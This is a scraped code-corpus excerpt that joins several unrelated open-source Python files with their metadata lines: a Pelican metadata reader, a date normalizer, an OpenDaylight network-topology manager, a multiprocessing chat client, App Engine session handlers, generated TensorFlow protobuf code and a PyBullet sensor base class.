alt=(['"])\3 )|(?: # alt before src <img [^\>]* alt=(['"])\4 [^\>]* src=(['"])(.*?)\5 ) """, re.X) for match in re.findall(imgs, content): logger.warning( 'Empty alt attribute for image %s in %s', os.path.basename(match[1] + match[5]), path, extra={'limit_msg': 'Other images have empty alt attributes'}) def default_metadata(settings=None, process=None): metadata = {} if settings: for name, value in dict(settings.get('DEFAULT_METADATA', {})).items(): if process: value = process(name, value) metadata[name] = value if 'DEFAULT_CATEGORY' in settings: value = settings['DEFAULT_CATEGORY'] if process: value = process('category', value) metadata['category'] = value if settings.get('DEFAULT_DATE', None) and \ settings['DEFAULT_DATE'] != 'fs': if isinstance(settings['DEFAULT_DATE'], six.string_types): metadata['date'] = get_date(settings['DEFAULT_DATE']) else: metadata['date'] = SafeDatetime(*settings['DEFAULT_DATE']) return metadata def path_metadata(full_path, source_path, settings=None): metadata = {} if settings: if settings.get('DEFAULT_DATE', None) == 'fs': metadata['date'] = SafeDatetime.fromtimestamp( os.stat(full_path).st_mtime) metadata.update(settings.get('EXTRA_PATH_METADATA', {}).get( source_path, {})) return metadata def parse_path_metadata(source_path, settings=None, process=None): r"""Extract a metadata dictionary from a file's path >>> import pprint >>> settings = { ... 'FILENAME_METADATA': r'(?P<slug>[^.]*).*', ... 'PATH_METADATA': ... r'(?P<category>[^/]*)/(?P<date>\d{4}-\d{2}-\d{2})/.*', ... } >>> reader = BaseReader(settings=settings) >>> metadata = parse_path_metadata( ... source_path='my-cat/2013-01-01/my-slug.html', ... settings=settings, ... process=reader.process_metadata) >>> pprint.pprint(metadata) # doctest: +ELLIPSIS {'category': <pelican.urlwrappers.Category object at ...>, 'date': SafeDatetime(2013, 1, 1, 0, 0), 'slug': 'my-slug'} """ metadata = {} dirname, basename = os.path.split(source_path) base, ext = os.path.splitext(basename) subdir = os.path.basename(dirname) if settings: checks = [] for key, data in [('FILENAME_METADATA', base), ('PATH_METADATA', source_path)]: checks.append((settings.get(key, None), data)) if settings.get('USE_FOLDER_AS_CATEGORY', None): checks.append(('(?P<category>.*)', subdir)) for regexp, data in checks: if regexp and data: match = re.match(regexp, data) if match: # .items() for py3k compat. for k, v in match.groupdict().items(): k = k.lower() # metadata must be lowercase if v is not None and k not in metadata: if process: v = process(k, v) metadata[k] = v return metadata
agpl-3.0
7,005,900,722,206,514,000
35.349929
79
0.559678
false
4.298402
false
false
false
Wikidata/StrepHit
strephit/commons/date_normalizer.py
1
7746
from __future__ import absolute_import import yaml import re import os import logging logger = logging.getLogger(__name__) class DateNormalizer(object): """ find matches in text strings using regular expressions and transforms them according to a pattern transformation expression evaluated on the match the specifications are given in yaml format and allow to define meta functions and meta variables as well as the pattern and transformation rules themselves. meta variables will be placed inside patterns which use them in order to make writing patterns easier. meta variables will be available to use from inside the meta functions too as a dictionary named meta_vars a pattern transformation expression is an expression which will be evaluated if the corresponding regular expression matches. the pattern transformation will have access to all the meta functions and meta variables defined and to a variable named 'match' containing the regex match found """ def __init__(self, language=None, specs=None): assert language or specs, 'please specify either one of the pre-set ' \ 'languages or provide a custom rule set' if specs is None: path = os.path.join(os.path.dirname(__file__), 'resources', 'normalization_rules_%s.yml' % language) with open(path) as f: specs = yaml.load(f) self._meta_init(specs) basic_r = {name: pattern for name, pattern in self.meta_vars.iteritems()} self.regexes = {} for category, regexes in specs.iteritems(): regexes = sum((x.items() for x in regexes), []) self.regexes[category] = [(re.compile(pattern.format(**basic_r) .replace(' ', '\\s*'), re.IGNORECASE), result) for pattern, result in regexes] def _meta_init(self, specs): """ Reads the meta variables and the meta functions from the specification :param dict specs: The specifications loaded from the file :return: None """ # read meta variables and perform substitutions self.meta_vars = {} if '__meta_vars__' in specs: for definition in specs.pop('__meta_vars__'): var, value = definition.items()[0] if isinstance(value, basestring): self.meta_vars[var] = value.format(**self.meta_vars) elif isinstance(value, dict): self.meta_vars[var] = { k: v.format(**self.meta_vars) for k, v in value.iteritems() } # compile meta functions in a dictionary self.meta_funcs = {} if '__meta_funcs__' in specs: for f in specs.pop('__meta_funcs__'): exec f in self.meta_funcs # make meta variables available to the meta functions just defined self.meta_funcs['__builtins__']['meta_vars'] = self.meta_vars self.globals = self.meta_funcs self.globals.update(self.meta_vars) def normalize_one(self, expression, conflict='longest'): """ Find the matching part in the given expression :param str expression: The expression in which to search the match :param str conflict: Whether to return the first match found or scan through all the provided regular expressions and return the longest or shortest part of the string matched by a regular expression. Note that the match will always be the first one found in the string, this parameter tells how to resolve conflicts when there is more than one regular expression that returns a match. When more matches have the same length the first one found counts Allowed values are `first`, `longest` and `shortest` :return: Tuple with (start, end), category, result :rtype: tuple Sample usage: >>> from strephit.commons.date_normalizer import DateNormalizer >>> DateNormalizer('en').normalize_one('Today is the 1st of June, 2016') ((13, 30), 'Time', {'month': 6, 'day': 1, 'year': 2016}) """ best_match = None expression = expression.lower() for category, regexes in self.regexes.iteritems(): for regex, transform in regexes: match = regex.search(expression) if not match: continue elif conflict == 'first': return self._process_match(category, transform, match, 0) elif best_match is None or \ conflict == 'longest' and match.end() - match.start() > best_match[1] or \ conflict == 'shortest' and match.end() - match.start() < best_match[1]: best_match = match, match.end() - match.start(), category, transform if best_match is None: return (-1, -1), None, None else: match, _, category, transform = best_match return self._process_match(category, transform, match, 0) def normalize_many(self, expression): """ Find all the matching entities in the given expression expression :param str expression: The expression in which to look for :return: Generator of tuples (start, end), category, result Sample usage: >>> from pprint import pprint >>> from strephit.commons.date_normalizer import DateNormalizer >>> pprint(list(DateNormalizer('en').normalize_many('I was born on April 18th, ' ... 'and today is April 18th, 2016!'))) [((14, 24), 'Time', {'day': 18, 'month': 4}), ((39, 55), 'Time', {'day': 18, 'month': 4, 'year': 2016})] """ # start matching from here, and move forward as new matches # are found so to avoid overlapping matches and return # the correct offset inside the original sentence position = 0 expression = expression.lower() for category, regexes in self.regexes.iteritems(): for regex, transform in regexes: end = 0 for match in regex.finditer(expression[position:]): yield self._process_match(category, transform, match, position) end = max(end, match.end()) position += end def _process_match(self, category, transform, match, first_position): result = eval(transform, self.globals, {'match': match}) start, end = match.span() return (first_position + start, first_position + end), category, result NORMALIZERS = {} def normalize_numerical_fes(language, text): """ Normalize numerical FEs in a sentence """ if language not in NORMALIZERS: NORMALIZERS[language] = DateNormalizer(language) normalizer = NORMALIZERS[language] logger.debug('labeling and normalizing numerical FEs of language %s...', language) count = 0 for (start, end), tag, norm in normalizer.normalize_many(text): chunk = text[start:end] logger.debug('Chunk [%s] normalized into [%s], tagged as [%s]' % (chunk, norm, tag)) # All numerical FEs are extra ones and their values are literals fe = { 'fe': tag, 'chunk': chunk, 'type': 'extra', 'literal': norm, 'score': 1.0 } count += 1 yield fe logger.debug('found %d numerical FEs into "%s"', count, text)
gpl-3.0
4,360,993,509,104,244,700
41.097826
98
0.590627
false
4.64946
false
false
false
FedericoRessi/networking-odl
networking_odl/ml2/network_topology.py
1
12691
# Copyright (c) 2015-2016 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import abc import importlib import logging import six from six.moves.urllib import parse from neutron.extensions import portbindings from oslo_log import log from oslo_serialization import jsonutils from networking_odl.common import cache from networking_odl.common import client from networking_odl.common import utils from networking_odl.common._i18n import _LI, _LW, _LE LOG = log.getLogger(__name__) class NetworkTopologyManager(object): # the first valid vif type will be chosed following the order # on this list. This list can be modified to adapt to user preferences. valid_vif_types = [ portbindings.VIF_TYPE_VHOST_USER, portbindings.VIF_TYPE_OVS] # List of class names of registered implementations of interface # NetworkTopologyParser network_topology_parsers = [ 'networking_odl.ml2.ovsdb_topology.OvsdbNetworkTopologyParser'] def __init__(self, vif_details=None, client=None): # Details for binding port self._vif_details = vif_details or {} # Rest client used for getting network topology from ODL self._client = client or NetworkTopologyClient.create_client() # Table of NetworkTopologyElement self._elements_by_ip = cache.Cache( self._fetch_and_parse_network_topology) # Parsers used for processing network topology self._parsers = list(self._create_parsers()) def bind_port(self, port_context): """Set binding for a valid segment """ host_name = port_context.host elements = list() try: # Append to empty list to add as much elements as possible # in the case it raises an exception elements.extend(self._fetch_elements_by_host(host_name)) except Exception: LOG.exception( _LE('Error fetching elements for host %(host_name)r.'), {'host_name': host_name}, exc_info=1) if not elements: # In case it wasn't able to find any network topology element # for given host then it uses the legacy OVS one keeping the old # behaviour LOG.warning( _LW('Using legacy OVS network topology element for port ' 'binding for host: %(host_name)r.'), {'host_name': host_name}) # Imported here to avoid cyclic module dependencies from networking_odl.ml2 import ovsdb_topology elements = [ovsdb_topology.OvsdbNetworkTopologyElement()] # TODO(Federico Ressi): in the case there are more candidate virtual # switches instances for the same host it choses one for binding # port. As there isn't any know way to perform this selection it # selects a VIF type that is valid for all switches that have # been found and a VIF type valid for all them. This has to be improved for vif_type in self.valid_vif_types: vif_type_is_valid_for_all = True for element in elements: if vif_type not in element.valid_vif_types: # it is invalid for at least one element: discard it vif_type_is_valid_for_all = False break if vif_type_is_valid_for_all: # This is the best VIF type valid for all elements LOG.debug( "Found VIF type %(vif_type)r valid for all network " "topology elements for host %(host_name)r.", {'vif_type': vif_type, 'host_name': host_name}) for element in elements: # It assumes that any element could be good for given host # In most of the cases I expect exactely one element for # every compute host try: return element.bind_port( port_context, vif_type, self._vif_details) except Exception: LOG.exception( _LE('Network topology element has failed binding ' 'port:\n%(element)s'), {'element': element.to_json()}) LOG.error( _LE('Unable to bind port element for given host and valid VIF ' 'types:\n' '\thostname: %(host_name)s\n' '\tvalid VIF types: %(valid_vif_types)s'), {'host_name': host_name, 'valid_vif_types': ', '.join(self.valid_vif_types)}) # TDOO(Federico Ressi): should I raise an exception here? def _create_parsers(self): for parser_name in self.network_topology_parsers: try: yield NetworkTopologyParser.create_parser(parser_name) except Exception: LOG.exception( _LE('Error initializing topology parser: %(parser_name)r'), {'parser_name': parser_name}) def _fetch_elements_by_host(self, host_name, cache_timeout=60.0): '''Yields all network topology elements referring to given host name ''' host_addresses = [host_name] try: # It uses both compute host name and known IP addresses to # recognize topology elements valid for given computed host ip_addresses = utils.get_addresses_by_name(host_name) except Exception: ip_addresses = [] LOG.exception( _LE('Unable to resolve IP addresses for host %(host_name)r'), {'host_name': host_name}) else: host_addresses.extend(ip_addresses) yield_elements = set() try: for _, element in self._elements_by_ip.fetch_all( host_addresses, cache_timeout): # yields every element only once if element not in yield_elements: yield_elements.add(element) yield element except cache.CacheFetchError as error: # This error is expected on most of the cases because typically not # all host_addresses maps to a network topology element. if yield_elements: # As we need only one element for every host we ignore the # case in which others host addresseses didn't map to any host LOG.debug( 'Host addresses not found in networking topology: %s', ', '.join(error.missing_keys)) else: LOG.exception( _LE('No such network topology elements for given host ' '%(host_name)r and given IPs: %(ip_addresses)s.'), {'host_name': host_name, 'ip_addresses': ", ".join(ip_addresses)}) error.reraise_cause() def _fetch_and_parse_network_topology(self, addresses): # The cache calls this method to fecth new elements when at least one # of the addresses is not in the cache or it has expired. # pylint: disable=unused-argument LOG.info(_LI('Fetch network topology from ODL.')) response = self._client.get() response.raise_for_status() network_topology = response.json() if LOG.isEnabledFor(logging.DEBUG): topology_str = jsonutils.dumps( network_topology, sort_keys=True, indent=4, separators=(',', ': ')) LOG.debug("Got network topology:\n%s", topology_str) at_least_one_element_for_asked_addresses = False for parser in self._parsers: try: for element in parser.parse_network_topology(network_topology): if not isinstance(element, NetworkTopologyElement): raise TypeError( "Yield element doesn't implement interface " "'NetworkTopologyElement': {!r}".format(element)) # the same element can be known by more host addresses for host_address in element.host_addresses: if host_address in addresses: at_least_one_element_for_asked_addresses = True yield host_address, element except Exception: LOG.exception( _LE("Parser %(parser)r failed to parse network topology."), {'parser': parser}) if not at_least_one_element_for_asked_addresses: # this will mark entries for given addresses as failed to allow # calling this method again as soon it is requested and avoid # waiting for cache expiration raise ValueError( 'No such topology element for given host addresses: {}'.format( ', '.join(addresses))) @six.add_metaclass(abc.ABCMeta) class NetworkTopologyParser(object): @classmethod def create_parser(cls, parser_class_name): '''Creates a 'NetworkTopologyParser' of given class name. ''' module_name, class_name = parser_class_name.rsplit('.', 1) module = importlib.import_module(module_name) clss = getattr(module, class_name) if not issubclass(clss, cls): raise TypeError( "Class {class_name!r} of module {module_name!r} doesn't " "implement 'NetworkTopologyParser' interface.".format( class_name=class_name, module_name=module_name)) return clss() @abc.abstractmethod def parse_network_topology(self, network_topology): '''Parses OpenDaylight network topology Yields all network topology elements implementing 'NetworkTopologyElement' interface found in given network topology. ''' @six.add_metaclass(abc.ABCMeta) class NetworkTopologyElement(object): @abc.abstractproperty def host_addresses(self): '''List of known host addresses of a single compute host Either host names and ip addresses are valid. Neutron host controller must know at least one of these compute host names or ip addresses to find this element. ''' @abc.abstractproperty def valid_vif_types(self): '''Returns a tuple listing VIF types supported by the compute node ''' @abc.abstractmethod def bind_port(self, port_context, vif_type, vif_details): '''Bind port context using given vif type and vit details This method is expected to search for a valid segment and then call following method: from neutron.common import constants from neutron.plugins.ml2 import driver_api port_context.set_binding( valid_segment[driver_api.ID], vif_type, vif_details, status=constants.PORT_STATUS_ACTIVE) ''' def to_dict(self): cls = type(self) return { 'class': cls.__module__ + '.' + cls.__name__, 'host_addresses': list(self.host_addresses), 'valid_vif_types': list(self.valid_vif_types)} def to_json(self): return jsonutils.dumps( self.to_dict(), sort_keys=True, indent=4, separators=(',', ': ')) class NetworkTopologyClient(client.OpenDaylightRestClient): _GET_ODL_NETWORK_TOPOLOGY_URL =\ 'restconf/operational/network-topology:network-topology' def __init__(self, url, username, password, timeout): if url: url = parse.urlparse(url) port = '' if url.port: port = ':' + str(url.port) topology_url = '{}://{}{}/{}'.format( url.scheme, url.hostname, port, self._GET_ODL_NETWORK_TOPOLOGY_URL) else: topology_url = None super(NetworkTopologyClient, self).__init__( topology_url, username, password, timeout)
apache-2.0
132,776,603,059,931,380
38.659375
79
0.588527
false
4.560187
false
false
false
tayebzaidi/PPLL_Spr_16
chat/client3.py
1
1260
from multiprocessing.connection import Client from random import random from time import sleep from multiprocessing.connection import Listener from multiprocessing import Process local_listener = (('127.0.0.1', 5003),'secret client 3 password') def client_listener(): cl = Listener(address=local_listener[0], authkey=local_listener[1]) print '.............client listener starting' print '.............accepting conexions' while True: conn = cl.accept() print '.............connection accepted from', cl.last_accepted m = conn.recv() print '.............message received from server', m if __name__ == '__main__': print 'trying to connect' conn = Client(address=('127.0.0.1', 6000), authkey='secret password server') conn.send(local_listener) cl = Process(target=client_listener, args=()) cl.start() connected = True while connected: value = raw_input("'C', stay connected. 'Q' quit connection") if value == 'Q': connected = False else: print "continue connected" conn.send("connected") print "last message" conn.send("quit") conn.close() cl.terminate() print "end client"
gpl-3.0
7,113,699,005,899,186,000
28.302326
80
0.605556
false
4.090909
false
false
false
laalaguer/gae-blog-module
gaesession/handlers.py
1
7633
import webapp2 from webapp2_extras import sessions class MainHandler(webapp2.RequestHandler): def get(self): # Session is stored on both client browser and our database session_1 = self.session_store.get_session(name='dbcookie',backend='datastore') previous_value_1 = session_1.get("my_attr_name") self.response.out.write('on db, ' + str(previous_value_1)) session_1["my_attr_name"] = "Hi! " + (previous_value_1 if previous_value_1 else "") self.response.out.write('<br>') # Session is stored on client browser only session_2 = self.session_store.get_session(name='clientcookie') previous_value_2 = session_2.get('my_attr_name') self.response.out.write('on client browser, ' + str(previous_value_2)) session_2['my_attr_name'] = "Hi! " + (previous_value_2 if previous_value_2 else "") self.response.out.write('<br>') # Session is stored on both client browser and our memcache for fast access session_3 = self.session_store.get_session(name='memcachecookie',backend="memcache") previous_value_3 = session_3.get('my_attr_name') self.response.out.write('on memcache, ' + str(previous_value_3)) session_3['my_attr_name'] = "Hi! " + (previous_value_3 if previous_value_3 else "") # this is needed for webapp2 sessions to work def dispatch(self): # Get a session store for this request. self.session_store = sessions.get_store(request=self.request) try: webapp2.RequestHandler.dispatch(self) finally: # Save all sessions. self.session_store.save_sessions(self.response) class MainHandlerWithArguments(webapp2.RequestHandler): def get(self, photo_key): # even with arguments, we call with dispatch(self) # Session is stored on both client browser and our database session_1 = self.session_store.get_session(name='dbcookie',backend='datastore') previous_value_1 = session_1.get("my_attr_name") self.response.out.write('on db, ' + str(previous_value_1)) session_1["my_attr_name"] = "Hi! " + (previous_value_1 if previous_value_1 else "") self.response.out.write('<br>') # Session is stored on client browser only session_2 = self.session_store.get_session(name='clientcookie') previous_value_2 = session_2.get('my_attr_name') self.response.out.write('on client browser, ' + str(previous_value_2)) session_2['my_attr_name'] = "Hi! " + (previous_value_2 if previous_value_2 else "") self.response.out.write('<br>') # Session is stored on both client browser and our memcache for fast access session_3 = self.session_store.get_session(name='memcachecookie',backend="memcache") previous_value_3 = session_3.get('my_attr_name') self.response.out.write('on memcache, ' + str(previous_value_3)) session_3['my_attr_name'] = "Hi! " + (previous_value_3 if previous_value_3 else "") # this is needed for webapp2 sessions to work def dispatch(self): # Get a session store for this request. self.session_store = sessions.get_store(request=self.request) try: webapp2.RequestHandler.dispatch(self) finally: # Save all sessions. self.session_store.save_sessions(self.response) from google.appengine.ext.webapp import blobstore_handlers from google.appengine.ext import blobstore class MyUploadHandler(blobstore_handlers.BlobstoreUploadHandler): def my_post_dispatch(self, *args, **kwargs): ''' A Fake dispatch method that you want to call inside your Route() Just an imitation of the webapp2 style dispatch() with limited functions ''' self.session_store = sessions.get_store(request=self.request) try: if self.request.method == 'POST': self.post(*args, **kwargs) # since webapp doesn't have dispatch() method like webapp2, we do it manually else: self.error(405) self.response.out.write('Method not allowed') finally: # Save all sessions. self.session_store.save_sessions(self.response) def wrapper(func): def dest(self, *args, **kwargs): print 'before decorated' # for your future use. you can write wrapper like 'user_required' func(self,*args, **kwargs) print 'after decorated' return dest @wrapper def post(self): # Get all the uploaded file info myfiles = self.get_uploads('file') # this is a list of blob key info # You do some operations on the myfiles, maybe transform them # maybe associate them with other ndb entities in your database # ... # But we also want to manipulate with the session, RIGHT ??? # Session is stored on both client browser and our database session_1 = self.session_store.get_session(name='dbcookie',backend='datastore') previous_value_1 = session_1.get("my_attr_name") self.response.out.write('on db, ' + str(previous_value_1)) session_1["my_attr_name"] = "Hi! " + (previous_value_1 if previous_value_1 else "") self.response.out.write('<br>') # Session is stored on client browser only session_2 = self.session_store.get_session(name='clientcookie') previous_value_2 = session_2.get('my_attr_name') self.response.out.write('on client browser, ' + str(previous_value_2)) session_2['my_attr_name'] = "Hi! " + (previous_value_2 if previous_value_2 else "") self.response.out.write('<br>') # Session is stored on both client browser and our memcache for fast access session_3 = self.session_store.get_session(name='memcachecookie',backend="memcache") previous_value_3 = session_3.get('my_attr_name') self.response.out.write('on memcache, ' + str(previous_value_3)) session_3['my_attr_name'] = "Hi! " + (previous_value_3 if previous_value_3 else "") # Finally, I delete them,just in case you won't let it go. [blobstore.delete(each.key()) for each in self.get_uploads('file')] class ServeBlobHandler(blobstore_handlers.BlobstoreDownloadHandler): ''' Serve the images to the public ''' def my_get_dispatch(self, *args, **kwargs): ''' A Fake dispatch method that you want to call inside your Route() Just an imitation of the webapp2 style dispatch() with limited functions ''' self.session_store = sessions.get_store(request=self.request) try: if self.request.method == 'GET': self.get(*args, **kwargs) # this is the real get method we want here else: self.error(405) self.response.out.write('Method not allowed') finally: # Save all sessions. self.session_store.save_sessions(self.response) def wrapper(func): def dest(self, *args, **kwargs): print 'before decorated' # for your future use. you can write wrapper like 'user_required' func(self,*args, **kwargs) print 'after decorated' return dest @wrapper def get(self, photo_key): if not blobstore.get(photo_key): self.error(404) else: self.send_blob(photo_key)
apache-2.0
-2,670,067,092,621,807,600
45.266667
120
0.617844
false
3.975521
false
false
false
fluxcapacitor/pipeline
libs/pipeline_model/tensorflow/core/framework/tensor_slice_pb2.py
1
4870
# Generated by the protocol buffer compiler. DO NOT EDIT! # source: tensorflow/core/framework/tensor_slice.proto import sys _b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1')) from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database from google.protobuf import descriptor_pb2 # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() DESCRIPTOR = _descriptor.FileDescriptor( name='tensorflow/core/framework/tensor_slice.proto', package='tensorflow', syntax='proto3', serialized_pb=_b('\n,tensorflow/core/framework/tensor_slice.proto\x12\ntensorflow\"\x80\x01\n\x10TensorSliceProto\x12\x33\n\x06\x65xtent\x18\x01 \x03(\x0b\x32#.tensorflow.TensorSliceProto.Extent\x1a\x37\n\x06\x45xtent\x12\r\n\x05start\x18\x01 \x01(\x03\x12\x10\n\x06length\x18\x02 \x01(\x03H\x00\x42\x0c\n\nhas_lengthB2\n\x18org.tensorflow.frameworkB\x11TensorSliceProtosP\x01\xf8\x01\x01\x62\x06proto3') ) _TENSORSLICEPROTO_EXTENT = _descriptor.Descriptor( name='Extent', full_name='tensorflow.TensorSliceProto.Extent', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='start', full_name='tensorflow.TensorSliceProto.Extent.start', index=0, number=1, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='length', full_name='tensorflow.TensorSliceProto.Extent.length', index=1, number=2, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ _descriptor.OneofDescriptor( name='has_length', full_name='tensorflow.TensorSliceProto.Extent.has_length', index=0, containing_type=None, fields=[]), ], serialized_start=134, serialized_end=189, ) _TENSORSLICEPROTO = _descriptor.Descriptor( name='TensorSliceProto', full_name='tensorflow.TensorSliceProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='extent', full_name='tensorflow.TensorSliceProto.extent', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[_TENSORSLICEPROTO_EXTENT, ], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=61, serialized_end=189, ) _TENSORSLICEPROTO_EXTENT.containing_type = _TENSORSLICEPROTO _TENSORSLICEPROTO_EXTENT.oneofs_by_name['has_length'].fields.append( _TENSORSLICEPROTO_EXTENT.fields_by_name['length']) _TENSORSLICEPROTO_EXTENT.fields_by_name['length'].containing_oneof = _TENSORSLICEPROTO_EXTENT.oneofs_by_name['has_length'] _TENSORSLICEPROTO.fields_by_name['extent'].message_type = _TENSORSLICEPROTO_EXTENT DESCRIPTOR.message_types_by_name['TensorSliceProto'] = _TENSORSLICEPROTO _sym_db.RegisterFileDescriptor(DESCRIPTOR) TensorSliceProto = _reflection.GeneratedProtocolMessageType('TensorSliceProto', (_message.Message,), dict( Extent = _reflection.GeneratedProtocolMessageType('Extent', (_message.Message,), dict( DESCRIPTOR = _TENSORSLICEPROTO_EXTENT, __module__ = 'tensorflow.core.framework.tensor_slice_pb2' # @@protoc_insertion_point(class_scope:tensorflow.TensorSliceProto.Extent) )) , DESCRIPTOR = _TENSORSLICEPROTO, __module__ = 'tensorflow.core.framework.tensor_slice_pb2' # @@protoc_insertion_point(class_scope:tensorflow.TensorSliceProto) )) _sym_db.RegisterMessage(TensorSliceProto) _sym_db.RegisterMessage(TensorSliceProto.Extent) DESCRIPTOR.has_options = True DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\030org.tensorflow.frameworkB\021TensorSliceProtosP\001\370\001\001')) try: # THESE ELEMENTS WILL BE DEPRECATED. # Please use the generated *_pb2_grpc.py files instead. import grpc from grpc.beta import implementations as beta_implementations from grpc.beta import interfaces as beta_interfaces from grpc.framework.common import cardinality from grpc.framework.interfaces.face import utilities as face_utilities except ImportError: pass # @@protoc_insertion_point(module_scope)
apache-2.0
6,296,427,293,374,174,000
35.343284
406
0.742094
false
3.27505
false
true
false
nrz/ylikuutio
external/bullet3/examples/pybullet/gym/pybullet_envs/minitaur/envs_v2/sensors/sensor.py
2
15551
# Lint as: python3 """A sensor prototype class. The concept is explained in: go/minitaur-gym-redesign-1.1 """ from __future__ import absolute_import from __future__ import division from __future__ import print_function from typing import Any, Iterable, Optional, Sequence, Text, Tuple, Union import gin import gym import numpy as np from pybullet_envs.minitaur.robots import robot_base from pybullet_envs.minitaur.robots import time_ordered_buffer _ARRAY = Sequence[float] _FloatOrArray = Union[float, _ARRAY] _DataTypeList = Iterable[Any] # For sensor with multiput outputs, key of the main observation in output dict. MAIN_OBS_KEY = "" # This allows referencing np.float32 in gin config files. For example: # lidar_sensor.LidarSensor.dtype = @np.float32 gin.external_configurable(np.float32, module="np") gin.external_configurable(np.float64, module="np") gin.external_configurable(np.uint8, module="np") # Observation blenders take a pair of low/high values. The low/high is measured # by the latency of the observation. So the low value is actually newer in time # and high value older. The coeff [0, 1] can be thinked as the distance between # the low and high value value, with 0 being 100% low value and 1 as 100% high # value. def linear_obs_blender(low_value: Any, high_value: Any, coeff: float): """Linear interpolation of low/high values based on coefficient value.""" return low_value * (1 - coeff) + high_value * coeff def closest_obs_blender(low_value: Any, high_value: Any, coeff: float): """Choosing the high or low value based on coefficient value.""" return low_value if coeff < 0.5 else high_value def newer_obs_blender(low_value: Any, unused_high_value: Any, unused_coeff: float): """Always choosing low value, which is the newer value between low/high.""" return low_value def older_obs_blender(unused_low_value: Any, high_value: Any, unused_coeff: float): """Always choosing the high value, which is the older value between low/high.""" return high_value @gin.configurable class Sensor(object): """A prototype class of sensors.""" def __init__( self, name: Text, sensor_latency: _FloatOrArray, interpolator_fn: Any, enable_debug_visualization: bool = False, ): """A basic constructor of the sensor. We do not provide a robot instance during __init__, as robot instances may be reloaded/recreated during the simulation. Args: name: the name of the sensor sensor_latency: There are two ways to use this expected sensor latency. For both methods, the latency should be in the same unit as the sensor data timestamp. 1. As a single float number, the observation will be a 1D array. For real robots, this should be set to 0.0. 2. As an array of floats, the observation will be a 2D array based on how long the history need to be. Thus, [0.0, 0.1, 0.2] is a history length of 3. Observations are stacked on a new axis appended after existing axes. interpolator_fn: Function that controls how to interpolate the two values that is returned from the time ordered buffer. enable_debug_visualization: Whether to draw debugging visualization. """ self._robot = None self._name = name # Observation space will be implemented by derived classes. self._observation_space = None self._sensor_latency = sensor_latency self._single_latency = True if isinstance(sensor_latency, (float, int)) else False self._enable_debug_visualization = enable_debug_visualization if not self._is_valid_latency(): raise ValueError("sensor_latency is expected to be a non-negative number " "or a non-empty list of non-negative numbers.") self._interpolator_fn = interpolator_fn or newer_obs_blender self._axis = -1 timespan = sensor_latency if self._single_latency else max(sensor_latency) self._observation_buffer = time_ordered_buffer.TimeOrderedBuffer( max_buffer_timespan=timespan) def _is_valid_latency(self): if self._single_latency: return self._sensor_latency >= 0 if self._sensor_latency: return all(value >= 0 for value in self._sensor_latency) return False def get_name(self) -> Text: return self._name @property def is_single_latency(self) -> bool: return self._single_latency @property def observation_space(self) -> gym.spaces.Space: return self._observation_space @property def enable_debug_visualization(self): return self._enable_debug_visualization @enable_debug_visualization.setter def enable_debug_visualization(self, enable): self._enable_debug_visualization = enable def get_observation_datatype(self): """Returns the data type for the numpy structured array. It is recommended to define a list of tuples: (name, datatype, shape) Reference: https://docs.scipy.org/doc/numpy-1.15.0/user/basics.rec.html Ex: return [('motor_angles', np.float64, (8, ))] # motor angle sensor return [('IMU_x', np.float64), ('IMU_z', np.float64), ] # IMU Will be deprecated (b/150818246) in favor of observation_space. Returns: datatype: a list of data types. """ raise NotImplementedError("Deprecated. Are you using the old robot class?") def get_lower_bound(self): """Returns the lower bound of the observation. Will be deprecated (b/150818246) in favor of observation_space. Returns: lower_bound: the lower bound of sensor values in np.array format """ raise NotImplementedError("Deprecated. Are you using the old robot class?") def get_upper_bound(self): """Returns the upper bound of the observation. Will be deprecated (b/150818246) in favor of observation_space. Returns: upper_bound: the upper bound of sensor values in np.array format """ raise NotImplementedError("Deprecated. Are you using the old robot class?") def _get_original_observation(self) -> Tuple[float, Any]: """Gets the non-modified observation. Different from the get_observation, which can pollute and sensor data with noise and latency, this method shall return the best effort measurements of the sensor. For simulated robots, this will return the clean data. For reals robots, just return the measurements as is. All inherited class shall implement this method. Returns: The timestamp and the original sensor measurements. Raises: NotImplementedError for the base class. """ raise NotImplementedError("Not implemented for base class." "") def get_observation(self): """Returns the observation data. Returns: observation: the observed sensor values in np.array format """ obs = self._observation_buffer.get_delayed_value(self._sensor_latency) if self._single_latency: if isinstance(self._observation_space, gym.spaces.Dict): return self._interpolator_fn(obs.value_0, obs.value_1, obs.coeff) else: return np.asarray( self._interpolator_fn(obs.value_0, obs.value_1, obs.coeff)) else: if isinstance(self._observation_space, gym.spaces.Dict): # interpolate individual sub observation interpolated = [ self._interpolator_fn(data.value_0, data.value_1, data.coeff) for data in obs ] stacked_per_sub_obs = {} for k in interpolated[0]: stacked_per_sub_obs[k] = np.stack( np.asarray([d[k] for d in interpolated]), axis=self._axis) return stacked_per_sub_obs else: obs = np.asarray([ self._interpolator_fn(data.value_0, data.value_1, data.coeff) for data in obs ]) return np.stack(obs, axis=self._axis) def set_robot(self, robot: robot_base.RobotBase): """Set a robot instance.""" self._robot = robot def get_robot(self): """Returns the robot instance.""" 